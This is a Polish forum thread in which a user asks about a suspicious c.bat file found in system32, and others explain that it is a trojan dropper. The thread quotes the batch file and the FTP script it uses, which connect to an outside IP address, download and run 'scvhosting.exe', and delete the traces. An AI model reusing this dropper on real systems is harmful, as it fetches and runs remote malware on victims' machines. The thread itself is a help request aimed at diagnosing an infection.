Praca pod dosem


(Taitus) #1

co może oznaczać dana komenda,czy to w jakiś sposób może kojarzyć się z trojanem lub wirusem.Plik był zapisany jako c.bat. W edytorze ukazuje się :

@echo off

ftp -n -v -s:.pif

scvhosting.exe

del .pif

del /F c.bat

exit /y

Plik ten znalazłem w windows\system32\c.bat. Jeszcze jedno pytanie. Co jest zbierane w katalogu window\prefetch>prosze o pomoc


(Asdaf) #2

z tego co wynika z mojej (ograniczonej) wiedzy nt. DOS'u to, rzeczywiście chodzi tu o jakiegoś trojana albo inny syf.

plik c.bat każe komputerowi połączyć się z serwerem ftp i uruchomić (pobrać) znajdujący się na nim plik scvhosting.exe, następnie skasować pliki .pif i c.bat i zakończyć działanie programu.

poszukaj w katalogu system32 plików z rozszerzeniem *.pif - powinien być tylko jeden - i przejrzyj jego zawartość notatnikiem, w środku powinien znajdować się adres tego ftp'a.


(Taitus) #3

dzięki za pomoc w tym skrócie znalazłem zapis :

open 213.134.170.96 20345

user a a

binary

GET scvhosting.exe

bye

Teraz tylko pytanie w jaki sposób moge się dowiedzieć gdzie jest ten adres ip ?


(Marsmo) #4

Witaj krajanie! :slight_smile:

Tu znajdujesz adresy ip - wystarczy wrzucić w wyszukiwarkę :slight_smile:

http://ripe.net/db/whois/whois.html

Tu masz konkretny wynik wyszukiwania - zaznaczam, te adresy są podawane na poziomie administracji!

http://ripe.net/perl/whois?form_type=si ... rch=Search

Jedziesz więc do kablówki i gadasz konkretnie z Adminem; skutki mogą być różne! Tzn. niekoniecznie Admin się przejmie i zbada sprawę od podszewki (choć ma takie narzędzia), ale w najgorszym razie nic nie tracisz - spróbować można!

Być może ten zestaw liczb - po adresie ip - czyli 20345 jest jakąś wskazówką... :roll: Albo też i nie... :expressionless:


(Dupek1000) #5

no to jest syf bo czesto trojany upodabniaja swoja nazwe do plikow sysemowych dodaja jedna literqe